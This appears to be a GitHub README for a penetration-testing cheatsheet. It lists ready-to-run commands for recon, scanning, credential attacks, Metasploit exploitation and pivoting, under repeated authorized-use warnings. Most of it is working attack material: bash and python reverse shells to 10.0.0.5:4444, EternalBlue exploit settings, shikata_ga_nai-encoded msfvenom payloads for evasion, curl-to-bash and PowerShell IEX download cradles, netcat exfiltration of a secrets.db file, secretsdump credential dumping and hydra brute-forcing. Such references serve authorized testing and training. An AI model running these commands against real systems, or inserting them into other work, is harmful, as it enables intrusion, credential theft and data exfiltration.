Penetration Testing & Vulnerability Research Cheatsheet 🛡️ A practical, searchable command reference for recon, scanning, fuzzing, reversing, and exploitation. Intended for authorized use only—specifically for educational, defensive hardening, and professional security testing/lab environments.
🚨 IMPORTANT: AUTHORIZED USE ONLY Do not run these commands against systems you do not own or for which you do not have explicit written authorization from the asset owner. Misuse is illegal and unethical.
Contents
- Overview & Safety
- Live Demo
- Quick Usage
- Cheatsheet (by topic)
-
- Recon & OSINT
-
- Recon: Search Engine Dorking & Exposed Assets
-
- SEO & Indexation Security
-
- Subdomain & DNS Enumeration
-
- Port & Service Discovery
-
- Web Discovery & Fuzzing
-
- Web Application Testing
-
- Vulnerability Scanning & SCA
-
- Passwords, Credentials & AD Tooling
-
- Exploitation: Metasploit Framework (MSF)
-
- Post-Exploitation: Shells & Enumeration
-
- Network & TLS Checks
-
- Vulnerability Research & PoC Triage
-
- Binary Reversing & Exploit Development
-
- Fuzzing
-
- Mobile & Firmware Analysis
-
- Safe PoC Testing & Logging
-
- Evasion & msfvenom Payloads
-
- File Transfer (In-Memory & On-Disk)
-
- Tunneling & Pivoting
-
- Project & Hosting
- Contribution & Customization
- Ethical & Legal Notice
- License Overview & Safety This repository contains a compact, command-focused cheatsheet designed to speed up authorized penetration testing and vulnerability research workflows. The goal is portability and clarity:
- Fully client-side and portable (single HTML file).
- Searchable and designed for quick command copying.
- Prioritizes safe, lab-first workflows (e.g., isolate PoCs and avoid unintended production testing). Always test Proof-of-Concepts (PoCs) in isolated VMs or containers and maintain system snapshots. Never introduce exploit code or active tools to networks containing production or sensitive systems. Live Demo A lightweight, read-only demo of the cheatsheet is available for quick preview and sharing. This is the recommended way to view the final rendered output. 🔗 Live Demo: https://hackerscheatsheet.onrender.com/
Note: The demo only hosts static HTML/CSS/JS without any backend scanning or exploit capability. For full, local testing, cloning the repository is recommended.
Quick Usage
- Local Preview After cloning the repository, you can open the single index.html file directly in your browser: git clone https://github.com/tripping-alien/HackersCheatsheet.git cd HackersCheatsheet
- Publish with GitHub Pages This is the easiest way to host your own version of the cheatsheet publicly or privately:
- Push your repository (or a fork) to GitHub.
- Go to Settings → Pages.
- Select the main branch and the / (root) folder as the source.
- Save. Your site will be available at https://.github.io//. Cheatsheet (by topic)
Important: Always replace placeholders like example.com, 192.0.2.0/24, and 10.0.0.5 with real in-scope targets only.
- Recon & OSINT Footprinting, WHOIS, DNS lookups, and passive certificate data gathering.
TARGET=example.com
whois $TARGET
dig +noall +answer $TARGET A dig +noall +answer $TARGET MX dig +noall +answer $TARGET NS
curl -I -L --max-redirs 5 https://$TARGET
curl -s "https://crt.sh/?q=%25.$TARGET&output=json" | jq -r '.[].name_value' | sort -u
theharvester -d example.com -b google,bing,linkedin -l 500 shodan host 1.2.3.4
- Recon: Search Engine Dorking & Exposed Assets Using advanced search operators (Dorks) to discover exposed files, directories, and misconfigurations.
site:target.com filetype:pdf confidential site:target.com filetype:xls password
intitle:"login page" inurl:admin site:target.com
inurl:wp-config.php OR inurl:.env filetype:txt intitle:"index of /" log
cache:https://target.com/page-with-old-data
intitle:"report" filetype:docx site:target.com
- SEO & Indexation Security Testing for misconfigurations in robots.txt, meta tags, and canonical URLs.
curl -s https://example.com/robots.txt | grep -i "disallow"
grep -i 'meta name="robots"' page_source.html
grep -i '<link rel="canonical"' page_source.html
site:example.com inurl:sessionid= OR inurl:PHPSESSID=
- Subdomain & DNS Enumeration Discovering subdomains and advanced DNS records using specialized tools.
amass enum -d example.com -o amass.txt
subfinder -d example.com -o subfinder.txt
dnsrecon -d example.com -t std,brt,srv
- Port & Service Discovery Aggressive port scanning, service versioning, and banner grabbing.
nmap -sC -sV -p- -T4 --min-rate 1000 -oA nmap-full 192.0.2.0/24
nmap -sn 192.0.2.0/24
nc -vz 192.0.2.10 80
- Web Discovery & Fuzzing Bruteforcing directories, files, and virtual hosts.
ffuf -u https://example.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200,301,302 -o ffuf.json
gobuster dir -u https://example.com/ -w /usr/share/wordlists/dirb/common.txt -t 50 -o gobuster.txt
- Web Application Testing Quick vulnerability checks for common web flaws.
nikto -h https://example.com -output nikto.txt
sqlmap -u "https://example.com/vuln.php?id=1" --batch --dbs
xsstrike -u "https://example.com/page?param=1"
arjun -u "https://example.com/page" -o arjun.txt
- Vulnerability Scanning & SCA Automated vulnerability template scanning, SBOM generation, and analysis.
nuclei -l hosts.txt -t cves/ -o nuclei_results.txt
syft packages dir:./project -o json > sbom.json
grype sbom:sbom.json
curl -s "https://services.nvd.nist.gov/rest/json/cve/1.0/CVE-2021-44228" | jq .
- Passwords, Credentials & AD Tooling Online bruteforce (authorized only), offline hash cracking, and Active Directory enumeration.
hydra -L users.txt -P passwords.txt -t 4 ssh://192.0.2.10 -o hydra-ssh.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt
python3 /opt/impacket/examples/secretsdump.py domain/USER:PASS -outputfile secrets
Invoke-BloodHound -CollectionMethod All -ZipFileName bloodhound.zip
- Exploitation: Metasploit Framework (MSF) Core MSF commands for searching, configuring, and executing exploits.
msfconsole
search cve:2017-0143 search type:exploit platform:windows smb
use exploit/windows/smb/ms17_010_eternalblue
show options set RHOSTS 192.168.1.0/24 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.0.0.5
check
exploit
- Post-Exploitation: Shells & Enumeration Listener commands, common reverse shell one-liners, and local privilege escalation.
nc -lvnp 4444
bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
curl -s https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh | sh
.\winpeas.exe
- Network & TLS Checks Traffic capture, packet analysis, and SSL/TLS configuration checks.
tcpdump -i eth0 -w capture.pcap -c 1000
tshark -r capture.pcap -Y "http" -T fields -e http.host -e http.request.uri
openssl s_client -connect example.com:443 </dev/null 2>/dev/null | openssl x509 -noout -text
sslyze --regular example.com:443
- Vulnerability Research & PoC Triage Searching local exploit databases and safely running proof-of-concept code in isolation.
searchsploit "CVE-2021-44228" searchsploit -m 49993 # copy exploit by EDB ID
curl -sL "https://raw.githubusercontent.com/user/repo/branch/poc.py" -o /tmp/poc.py
docker run --rm -v /tmp/poc.py:/poc/poc.py --network none -it python:3.10 bash -c "python /poc/poc.py"
- Binary Reversing & Exploit Development Static analysis (ELF), ROP gadget hunting, and interactive debugging setup.
readelf -h binary objdump -d binary | less strings binary
r2 -AA binary
ropgadget --binary binary --only "pop|ret" > gadgets.txt
gdb -q ./binary
- Fuzzing Instrumented binary fuzzing and HTTP request fuzzing for input discovery.
afl-fuzz -i in_dir -o out_dir -- ./target @@
wfuzz -c -z file,/usr/share/wordlists/parameters.txt --hc 404 "https://example.com/vuln?FUZZ=1"
- Mobile & Firmware Analysis Decompilation of APKs, dynamic runtime analysis (Frida), and firmware extraction.
apktool d app.apk -o app_src
jadx -d out app.apk
frida -U -f com.example.app -l script.js --no-pause
binwalk -e firmware.bin strings firmware.bin | grep -i password
- Safe PoC Testing & Logging Techniques for safe, reproducible testing environments and comprehensive logging.
docker run --rm --network none -v $(pwd):/work -it ubuntu:22.04 bash
docker run --rm -p 8080:80 vuln-app:latest
(tool --version 2>&1 ; date; tool [args]) |& tee logfile.txt
nuclei -l hosts.txt -o nuclei.json -oJ nuclei.json ffuf -u https://example.com/FUZZ -w /wordlist.txt -o ffuf.json -of json
- Evasion & msfvenom Payloads Generating and encoding reverse shell payloads. AUTHORIZED USE ONLY.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > /root/Desktop/payload-enc.exe
msfvenom -p cmd/unix/reverse_python LHOST=10.0.0.5 LPORT=4444 -f raw
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f asp > shell.asp
- File Transfer (In-Memory & On-Disk) Common methods to transfer files to and from a compromised host (Linux/Windows).
python3 -m http.server 8000
wget http://10.0.0.5:8000/tool.sh
curl http://10.0.0.5:8000/script.sh | bash
nc -l -p 8888 > received_data.txt
nc 10.0.0.5 8888 < secrets.db
IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/shell.ps1')
- Tunneling & Pivoting Establishing network access to otherwise unreachable internal networks from a compromised host (pivoting).
ssh -L 8080:192.168.1.10:80 user@jumpbox.corp
ssh -R 9000:127.0.0.1:80 user@10.0.0.5
portfwd add -l 3389 -r 192.168.1.15 -p 3389
use auxiliary/server/socks_proxy set SRVHOST 0.0.0.0 set SRVPORT 1080 run
./chisel server -p 8000 --socks5
./chisel client 10.0.0.5:8000 R:1080:socks
Project & Hosting
| Feature | Details |
|---|---|
| Technology Stack | HTML5, CSS3 (hacker aesthetic), Vanilla JS for client-side functionality (copy, collapse, translation). |
| Core Principle | Fully self-contained in a single index.html file for portability. |
| File Structure | index.html (main cheatsheet), README.md (this file). |
| Contribution & Customization | |
| Contributions are welcome! Feel free to open a Pull Request (PR) to add new tools, templates, or safer workflows. | |
| Customization | |
| The cheatsheet is easy to adapt to your style: |
- Edit the blocks in index.html to add, remove, or modify sections and commands.
- Tweak the CSS color variables defined under :root in the <style> block for instant theme changes. Suggested Git Workflow
git checkout -b feat/add-new-section
git add README.md index.html git commit -m "feat: Add new section for file transfer methods"
git push origin feat/add-new-section
Ethical & Legal Notice This project is intended for authorized penetration testing, lab simulations, and defensive training only. The author assumes no liability for misuse. You are responsible for your own actions and for ensuring you have the proper legal authority for any active testing you conduct. By using this cheatsheet, you confirm you understand and will comply with all applicable laws and obtain proper, current authorization before conducting any active testing. License MIT License Copyright (c) 2025 Andrey Lopukhov Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.